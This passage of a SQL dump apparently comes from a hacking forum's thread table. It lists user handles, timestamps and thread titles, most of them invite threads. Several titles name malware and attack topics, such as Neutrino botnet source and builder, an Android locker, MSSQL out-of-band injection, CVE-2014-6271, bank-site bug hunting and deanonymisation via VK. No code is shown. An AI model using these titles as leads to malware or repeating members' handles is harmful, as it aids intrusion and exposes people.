0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410383376, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1682, '{$name}', '', 1980, 1980, 1410387870, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410387870, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1696, '{$name}', '', 2013, 2013, 1410554211, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410554211, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1683, '{$name}', '', 1982, 1982, 1410397562, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410397562, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1685, 'GitHub account', '', 1984, 1988, 1410409907, 13, 0, 1, 4, 0, 0, 'w0rm', 1, 'w0rm', 1410402805, 58, 0, '', 1, 0, 0, 0, 0, '', NULL), (1686, '{$name}', '', 1990, 1990, 1410445714, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410445714, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1694, '{$name}', '', 2008, 2008, 1410541594, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410541594, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1687, '{$name}', '', 1995, 1995, 1410524092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410524092, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1688, '{$name}', '', 1997, 1997, 1410526507, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410526507, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1689, '{$name}', '', 1999, 1999, 1410529240, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529240, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1690, '{$name}', '', 2000, 2000, 1410529363, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529363, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1691, '{$name}', '', 2001, 2001, 1410529372, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529372, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1692, '{$name}', '', 2002, 2002, 1410529380, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529380, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1693, '{$name}', '', 2003, 2003, 1410529396, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410529396, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1695, '{$name}', '', 2011, 2015, 1410564285, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1410553474, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1698, '{$name}', '', 2020, 2020, 1410596999, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410596999, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1700, '{$name}', '', 2022, 2022, 1410621242, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410621242, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1701, '{$name}', '', 2023, 2023, 1410626021, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410626021, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1702, '{$name}', '', 2024, 2024, 1410631321, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410631321, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1703, '{$name}', '', 2025, 2025, 1410638092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410638092, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1704, '{$name}', '', 2026, 2026, 1410644725, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410644725, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1705, '{$name}', '', 2027, 2027, 1410644725, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410644725, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1706, '{$name}', '', 2028, 2028, 1410646206, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410646206, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1707, '{$name}', '', 2029, 2029, 1410647677, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410647677, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1708, '{$name}', '', 2030, 2030, 1410685721, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410685721, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1709, '{$name}', '', 2037, 2037, 1410704830, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410704830, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1710, '{$name}', '', 2039, 2039, 1410740359, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410740359, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1711, 'çøтðûúø', '', 2043, 2043, 1410780147, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410780147, 32, 0, '', 1, 0, 0, 0, 0, '', NULL), (1715, '{$name}', '', 2049, 2049, 1410807427, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410807427, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1716, '{$name}', '', 2050, 2050, 1410811430, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410811430, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1717, '{$name}', '', 2051, 2051, 1410821345, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410821345, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1718, '{$name}', '', 2052, 2052, 1410821938, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410821938, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1719, '{$name}', '', 2055, 2055, 1410868692, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410868692, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1720, '{$name}', '', 2056, 2056, 1410870475, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410870475, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1721, '{$name}', '', 2058, 2058, 1410881729, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410881729, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1722, '{$name}', '', 2059, 2059, 1410881810, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410881810, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1724, '{$name}', '', 2062, 2062, 1410897230, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410897230, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1725, '{$name}', '', 2063, 2063, 1410904618, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410904618, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1726, 'smapp.rand.org', '', 2064, 2064, 1410935386, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410935386, 42, 0, '', 1, 0, 0, 0, 0, '', NULL), (1727, '{$name}', '', 2065, 2065, 1410963293, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410963293, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1728, 'чекните плиз на баги сÂайты банка тинькофm', '', 2066, 2100, 1411050937, 7, 0, 1, 11, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1410967868, 186, 0, '', 1, 0, 0, 0, 0, '', NULL), (1730, 'btc-e', '', 2088, 2096, 1411041157, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1411033268, 108, 0, '', 1, 0, 0, 0, 0, '', NULL), (1731, '{$name}', '', 2089, 2089, 1411033750, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411033750, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1732, '{$name}', '', 2097, 2097, 1411043352, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411043352, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1733, 'inj', '', 2098, 2099, 1411049200, 7, 0, 1, 1, 0, 0, 'null', 9, 'w0rm', 1411044801, 61, 0, '', 1, 0, 0, 0, 0, '', NULL), (1736, '{$name}', '', 2105, 2105, 1411095490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411095490, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (1737, '{$name}', '', 2106, 2106, 1411142645, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411142645, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1738, '{$name}', '', 2107, 2107, 1411150490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411150490, 19, 0, '', 1, 0, 0, 0, 0, '', NULL), (1739, '{$name}', '', 2108, 2108, 1411160962, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411160962, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1740, '{$name}', '', 2110, 2110, 1411232341, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411232341, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1742, '{$name}', '', 2112, 2112, 1411255831, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411255831, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1743, '{$name}', '', 2113, 2113, 1411294539, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411294539, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1744, '{$name}', '', 2114, 2114, 1411304351, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304351, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1745, '{$name}', '', 2115, 2115, 1411304352, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304352, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1746, '{$name}', '', 2116, 2116, 1411304356, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304356, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1747, '{$name}', '', 2117, 2117, 1411304358, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411304358, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1748, 'Idei pentru comunitatea noastră', '', 2118, 2149, 1411474668, 13, 0, 1, 8, 0, 0, 'lumbricus', 39, 'lumbricus', 1411306253, 65, 0, '', 1, 0, 0, 0, 0, '', 'ideas'), (1749, '{$name}', '', 2122, 2122, 1411346254, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411346254, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1750, '{$name}', '', 2123, 2123, 1411361827, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411361827, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1751, 'Mssql - извлечение слепой внеполосÂный (out of band)', '', 2126, 2126, 1411379049, 7, 0, 1, 0, 0, 0, 'lumbricus', 39, 'lumbricus', 1411379049, 36, 0, '', 1, 0, 0, 0, 0, '', NULL), (1762, '{$name}', '', 2145, 2145, 1411464513, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411464513, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1752, '{$name}', '', 2128, 2128, 1411383285, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411383285, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1754, '{$name}', '', 2133, 2133, 1411400844, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411400844, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1755, '{$name}', '', 2134, 2134, 1411402415, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411402415, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1756, '{$name}', '', 2135, 2135, 1411407154, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411407154, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (1757, '{$name}', '', 2136, 2136, 1411410515, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411410515, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1758, '{$name}', '', 2139, 2139, 1411430327, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411430327, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1759, '{$name}', '', 2140, 2140, 1411433455, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411433455, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1760, '{$name}', '', 2141, 2143, 1411460935, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1411438471, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (1761, '{$name}', '', 2142, 2142, 1411455857, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411455857, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1763, '{$name}', '', 2148, 2148, 1411471797, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411471797, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (1764, '{$name}', '', 2150, 2150, 1411574850, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411574850, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1766, '{$name}', '', 2152, 2152, 1411590646, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411590646, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (1767, 'Cve-2014-6271', '', 2153, 2157, 1411657400, 15, 0, 1, 1, 0, 0, 'lumbricus', 39, 'syslink', 1411641697, 115, 0, '', 1, 0, 0, 0, 0, '', NULL), (1768, '{$name}', '', 2154, 2154, 1411645121, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411645121, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (1769, '{$name}', '', 2155, 2155, 1411647371, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411647371, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1817, '{$name}', '', 2209, 2209, 1411925372, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411925372, 27, 0, '', 1, 0, 0, 0, 0, '', NULL), (1816, '{$name}', '', 2208, 2208, 1411925358, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411925358, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1815, '{$name}', '', 2207, 2207, 1411924925, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411924925, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1814, '{$name}', '', 2206, 2206, 1411924060, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411924060, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (1813, '{$name}', '', 2205, 2205, 1411882830, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411882830, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (1811, '{$name}', '', 2203, 2203, 1411824082, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411824082, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (1810, '{$name}', '', 2202, 2202, 1411822286, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411822286, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (1809, '{$name}', '', 2201, 2201, 1411820182, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411820182, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1808, '{$name}', '', 2199, 2199, 1411809920, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411809920, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1803, '{$name}', '', 2192, 2192, 1411673862, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411673862, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1804, '{$name}', '', 2195, 2195, 1411725110, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411725110, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1805, '{$name}', '', 2196, 2196, 1411736385, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411736385, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1806, '{$name}', '', 2197, 2197, 1411750650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411750650, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1820, '{$name}', '', 2220, 2220, 1411992475, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411992475, 91, 0, '', 1, 0, 0, 0, 0, '', NULL), (1819, 'w0rm Cloud', '', 2213, 2213, 1411955430, 10, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1411955430, 161, 0, '', 1, 1, 0, 0, 0, '', NULL), (1826, 'деанон через vk', '', 2234, 2242, 1421257940, 13, 0, 1, 4, 0, 0, 'admin', 1, 'admin', 1421086243, 53, 0, '', 2, 0, 0, 0, 0, '', NULL), (1830, 'new admin - yakuza112', '', 2245, 2845, 1443308276, 13, 0, 1, 5, 0, 0, 'admin', 1, 'ropertus', 1422122659, 159, 0, '', 1, 0, 0, 0, 0, '', NULL), (1834, 'Source code android locker', '', 2260, 2260, 1432480259, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1432480259, 69, 0, '', 1, 0, 0, 0, 0, '', NULL), (1840, 'forum-seo.net', '', 2271, 2271, 1437013460, 10, 0, 1, 0, 0, 0, 'Versus71', 165, 'Versus71', 1437013460, 151, 0, '', 0, 0, 0, 0, 0, '', NULL), (1841, 'phreaker.us', '', 2272, 2272, 1437629241, 10, 0, 1, 0, 0, 0, 'Versus71', 165, 'Versus71', 1437629241, 51, 0, '', 0, 0, 0, 0, 0, '', NULL), (1848, 'metaizm', '', 2279, 2279, 1439096915, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439096915, 36, 0, '', 1, 1, 0, 0, 0, '', NULL), (2506, 'BitTorrent', '', 3046, 3046, 1463762659, 37, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1463762659, 865, 0, '', 1, 0, 0, 0, 0, '', NULL), (1853, 'tdss', '', 2285, 2285, 1439233133, 4, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439233133, 58, 0, '', 1, 1, 0, 0, 0, '', NULL), (1855, 'geneticsandsociety.org', '', 2287, 2287, 1439273803, 10, 0, 1, 0, 0, 0, 'st1x0', 171, 'st1x0', 1439273803, 29, 0, '', 1, 0, 0, 0, 0, '', NULL), (1858, 'gagaloop', '', 2299, 2299, 1439404016, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1439404016, 23, 0, '', 1, 1, 0, 0, 0, '', NULL), (1859, 'megafon', '', 2300, 2304, 1439824907, 7, 0, 1, 1, 0, 0, 'w0rm', 100, 'w0rm', 1439792087, 36, 0, '', 0, 0, 0, 0, 0, '', NULL), (1861, 'download Neutrino Botnet source code + builder', '', 2303, 2692, 1440888161, 15, 0, 1, 10, 0, 0, 'hunter_exploitkit', 172, '*Hash*', 1439821381, 166, 0, '', 1, 0, 0, 0, 0, '', NULL), (1868, 'Phant0m', '', 2318, 2318, 1440201655, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440201655, 20, 0, '', 1, 1, 0, 0, 0, '', NULL), (1862, 'Black box list', '', 2305, 2893, 1445629858, 7, 0, 1, 9, 0, 0, 'w0rm', 100, 'w0rm', 1439826864, 197, 0, '', 1, 1, 0, 0, 0, '', NULL), (1864, 'nickname', '', 2313, 2313, 1440010165, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440010165, 15, 0, '', 1, 1, 0, 0, 0, '', NULL), (1865, 'ree4', '', 2314, 2314, 1440013600, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440013600, 26, 0, '', 1, 1, 0, 0, 0, '', NULL), (1869, 'bidex', '', 2320, 2320, 1440258049, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440258049, 13, 0, '', 1, 1, 0, 0, 0, '', NULL), (1870, 'NFM, nfmka', '', 2325, 2325, 1440398653, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440398653, 19, 0, '', 1, 1, 0, 0, 0, '', NULL), (1871, 'dark001', '', 2326, 2326, 1440413665, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1440413665, 19, 0, '', 1, 1, 0, 0, 0, '', NULL), (2400, 'Malware Source Code', '', 2906, 2907, 1446705102, 15, 0, 1, 1, 0, 0, 'dark001', 178, 'st1x0', 1446704703, 75, 0, '', 1, 0, 0, 0, 0, '', NULL), (2398, 'EXploits Databases', '', 2899, 2899, 1446017213, 10, 0, 1, 0, 0, 0, 'dark001', 178, 'dark001', 1446017213, 79, 0, '', 1, 0, 0, 0, 0, '', NULL), (2397, 'Megafon', '', 2894, 2898, 1445878300, 7, 0, 1, 1, 0, 0, 'w0rm', 100, 'Kingbeef', 1445771564, 37, 0, '', 0, 0, 0, 0, 0, '', NULL), (2392, 'forum-seo.net', '', 2878, 2878, 1444660755, 37, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1444660755, 1070, 0, '', 1, 0, 0, 0, 0, '', NULL), (2387, 'mrsalvadore', '', 2862, 2862, 1443389868, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443389868, 8, 0, '', 1, 1, 0, 0, 0, '', NULL), (2346, 'hackers & carders forums', '', 2801, 2936, 1449041270, 37, 0, 1, 6, 0, 0, 'w0rm', 100, 'w0rm', 1442919903, 2698, 0, '', 1, 0, 0, 0, 0, '', NULL), (2360, 'crackss', '', 2819, 2819, 1443006075, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443006075, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2357, 'json10331', '', 2815, 2815, 1442950510, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442950510, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2342, 'Monopoly.ms', '', 2800, 2933, 1448806747, 37, 0, 1, 1, 0, 0, 'w0rm', 100, 'w0rm', 1442918885, 836, 0, '', 1, 0, 0, 0, 0, '', NULL), (2361, 'Oleg', '', 2820, 2820, 1443007048, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443007048, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2362, 'as1w', '', 2821, 2821, 1443020435, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443020435, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2363, 'f0ros', '', 2822, 2822, 1443022317, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443022317, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2364, 'nickname', '', 2823, 2823, 1443023396, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443023396, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2319, 'esmurf', '', 2787, 2787, 1442836747, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442836747, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2316, 'nickname', '', 2783, 2783, 1442833996, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442833996, 0, 0, '', 2, 1, 0, 0, 0, '', NULL), (2299, 'sAv', '', 2763, 2763, 1442755750, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442755750, 8, 0, '', 1, 1, 0, 0, 0, '', NULL), (2300, 'Full_Crash', '', 2764, 2764, 1442761011, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761011, 8, 0, '', 1, 1, 0, 0, 0, '', NULL), (2301, 'Zhak', '', 2765, 2765, 1442761194, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761194, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2302, 'Zhak', '', 2766, 2766, 1442761346, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442761346, 8, 0, '', 1, 1, 0, 0, 0, '', NULL), (2303, 'anri12', '', 2767, 2767, 1442774668, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442774668, 7, 0, '', 1, 1, 0, 0, 0, '', NULL), (2304, 'noescape0', '', 2768, 2768, 1442778012, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442778012, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2305, 'nickname', '', 2769, 2769, 1442778920, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442778920, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2306, 'tunboy', '', 2770, 2770, 1442782064, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442782064, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2309, 'ketniggo', '', 2775, 2775, 1442819244, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442819244, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2310, 'justfrorgetaboutme', '', 2776, 2776, 1442825199, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442825199, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2311, 'nickname', '', 2777, 2777, 1442833259, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442833259, 1, 0, '', 2, 1, 0, 0, 0, '', NULL), (2294, 'LukcyRab', '', 2758, 2758, 1442739590, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442739590, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2293, 'LukcyRab', '', 2757, 2757, 1442739549, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442739549, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2292, 'fgddge', '', 2756, 2756, 1442718133, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442718133, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2290, 'aaj6', '', 2753, 2753, 1442706380, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442706380, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2291, 'aaj6', '', 2754, 2754, 1442706436, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442706436, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2289, 'mmmmmmm9999', '', 2752, 2752, 1442702293, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442702293, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2271, 'Nurba', '', 2734, 2734, 1442671151, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442671151, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2270, 'svyatoal', '', 2733, 2733, 1442665349, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442665349, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2251, 'Jay', '', 2714, 2714, 1442588981, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442588981, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2250, 'sdfogsdofg45', '', 2713, 2713, 1442588547, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442588547, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2246, 'Clooney', '', 2709, 2709, 1442584933, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442584933, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2247, 'nickname', '', 2710, 2710, 1442585792, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442585792, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2248, 'temaniger', '', 2711, 2711, 1442585982, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442585982, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2307, 'nickname', '', 2773, 2773, 1442813894, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442813894, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2308, 'zoom', '', 2774, 2774, 1442816534, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442816534, 8, 0, '', 1, 1, 0, 0, 0, '', NULL), (2241, '#ziga', '', 2704, 2704, 1442583393, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583393, 7, 0, '', 1, 1, 0, 0, 0, '', NULL), (2378, 'nickname', '', 2844, 2844, 1443288935, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443288935, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2377, 'dotabooster.com', '', 2842, 2842, 1443200935, 10, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1443200935, 56, 0, '', 1, 0, 0, 0, 0, '', NULL), (2376, 'Robotxobot', '', 2841, 2841, 1443189792, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443189792, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2372, 'DocXor', '', 2834, 2834, 1443104630, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443104630, 10, 0, '', 1, 1, 0, 0, 0, '', NULL), (2358, 'Russo', '', 2816, 2816, 1442960147, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442960147, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2359, 'nickname', '', 